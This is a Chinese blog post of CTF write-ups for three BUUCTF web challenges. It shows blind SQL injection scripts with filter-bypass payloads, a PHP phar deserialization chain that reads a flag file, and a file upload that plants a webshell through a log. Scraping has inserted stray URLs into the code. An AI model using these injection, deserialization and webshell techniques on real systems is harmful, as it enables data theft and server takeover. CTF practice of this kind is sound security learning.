web|BUU刷题-web
[NCTF2019]SQLi 访问robots.txt
发现hint
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
If $_POST['passwd'] === admin's password,Then you will get the flag;
发现过滤了 太多东西 单引号都给过滤了 ,
不过这里可以用\来闭合’看了看php版本[外链图片
文章图片
可以用%00截断,那末思路就有了
先尝试一波正确回显
文章图片
看到回显welcome,那末可以利用这个来判断 bool类型
regexp 字符串匹配支持正则
脚本为主要语句为
data = https://www.it610.com/article/{'username': '\\',
'passwd': "||/**/passwd/**/regexp/**/\"^{}\";
{}".format((password+j),parse.unquote('%00'))
}脚本为
importrequests
importstring
from urllib import parse
string= string.ascii_lowercase + string.digits + '_'
url= 'http://0c034adc-a4d9-4fe6-98f2-5ca68f2effe9.node4.buuoj.cn:81/index.php'
password=''for i in range(50):
for j in string:
data = https://www.it610.com/article/{'username': '\\',
'passwd': "||/**/passwd/**/regexp/**/\"^{}\";
{}".format((password+j),parse.unquote('%00'))
}
res= requests.post(url=url,data=https://www.it610.com/article/data)
if('welcome' in res.text):
password+=j
print(password)
break
文章图片
然后 提交密码 得到flag
文章图片
看了看大佬wp 发现如果这里""被过滤的情况下可以用 16进制来绕过首先随便注册一个号进去
[CISCN2019 华北赛区 Day1 Web1]Dropbox
上传一个文件后 发现有下载功能 ->任意文件下载
bp抓一下包
文章图片
发现有戏
尝试一下 index.php显示文件不存在 那末路径换一下试试 最终…/…/index.php 文件存在
index.php
Name();
$a->Size();
?>
class.php
db = $db;
}public function user_exist($username) {$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;
");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {return false;
}
return true;
}public function add_user($username, $password) {if ($this->user_exist($username)) {return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);
");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}public function verify_user($username, $password) {if (!$this->user_exist($username)) {return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;
");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {return true;
}
return false;
}public function __destruct() {$this->db->close();
}
}class FileList {private $files;
private $results;
private $funcs;
public function __construct($path) {$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}public function __call($func, $args) {array_push($this->funcs, $func);
foreach ($this->files as $file) {$this->results[$file->name()][$func] = $file->$func();
}
}public function __destruct() {$table = '';
$table .= '';
foreach ($this->funcs as $func) {$table .= '' . htmlentities($func) . ' ';
}
$table .= 'Opt ';
$table .= ' ';
foreach ($this->results as $filename => $result) {$table .= '';
foreach ($result as $func => $value) {$table .= '' . htmlentities($value) . ' ';
}
$table .= '???è?? / ?? é?¤ ';
$table .= ' ';
}
echo $table;
}
}class File {public $filename;
public function open($filename) {$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {return true;
} else {return false;
}
}public function name() {return basename($this->filename);
}public function size() {$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0;
$size >= 1024 && $i < 4;
$i++) $size /= 1024;
return round($size, 2).$units[$i];
}public function detele() {unlink($this->filename);
}public function close() {return file_get_contents($this->filename);
}
}
?>
delete.php
open($filename)) {$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
找到
public function close() {
return file_get_contents($this->filename);
}
可以控制 那末尝试构造调用此方法
$a= new User();
$a->db= new File();
$a->db->filename= '/flag.txt'
可是这样构造没有回显 ,那采取间接方法.
那么我们就让$this->db = new FileList(),让它去调用close,然后调用__call(),然后调用
__call()方法在调用 _destruct函数,打印结果
构造如下
files = array(new File());
$this->results = array();
$this->funcs = array();
}}class File
{public $filename = '/flag.txt';
}
$a= new User();
$a->db= new FileList();
$phar = new Phar("myphar.phar");
//后缀名必须为phar$phar->startBuffering();
$phar->setStub("");
//设置stub
$phar->setMetadata($a);
//将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test");
//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
文章图片
[CISCN2019 总决赛 Day2 Web1]Easyweb 【web|BUU刷题-web】老套路 查看源代码 ,和访问robots.txt
源代码 发现类似注入点的地方
文章图片
User-agent: *
Disallow: *.php.bak
看师傅的wp 是访问
image.php.bak
得到源码
那就尝试一下注入
输入\0 时会被addslashes()函数转成 \ \0 进而将\0过滤留下 \从而可以转移’ 达到绕过目的
文章图片
可以利用
# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)
得出回显的内容有JFIF
尝试爆出数据库
import requests#username=123&password=Passwordurl ='http://d80bf902-c46b-46a9-82d1-c6da6e8bfb01.node4.buuoj.cn:81/image.php?id=\\0&path='#JFIF
# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)
#
#
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127while head < tail:
mid = (head + tail) >> 1
payload = f'or ascii(substr(database()/**/from/**/{
i}/**/for/**/1))>{
mid}%23'
r = requests.get(url + payload)
if "JFIF" in r.text:
head = mid + 1
else:
tail = midif head != 32:
result += chr(head)
else:
break
print(result)
数据库为
ciscnfinal
爆出表名
payload = f'or ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))/**/from/**/{
i}/**/for/**/1))>{
mid}%23'
文章图片
得到表名
那么直接爆出 password
payload = f'or ascii(substr((select/**/(password)from(users))/**/from/**/{i}/**/for/**/1))>{mid}%23'
文章图片
得到密码
文章图片
一个文件上传,那就传呗
文章图片
随便传个访问为
文章图片
发现文件名 在日志中
那么这里不能传 php 应该时过滤了php 那末利用短标签绕过
文件名
利用蚁剑连接 得到flag
文章图片
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 私有化轻量级持续集成部署方案--03-部署web服务(下)
- web网页模板|如此优秀的JS轮播图,写完老师都沉默了
- spring|spring boot项目启动websocket
- OC:|OC: WKWebView详解
- WKWebview|WKWebview js 调用oc 和oc调用js
- javaweb|基于Servlet+jsp+mysql开发javaWeb学生成绩管理系统
- webug3.0渗透基础第九、十关笔记
- 前端|web前端dya07--ES6高级语法的转化&render&vue与webpack&export
- WebSocket|WebSocket 语法解析
- webpack|webpack 配置参考(production)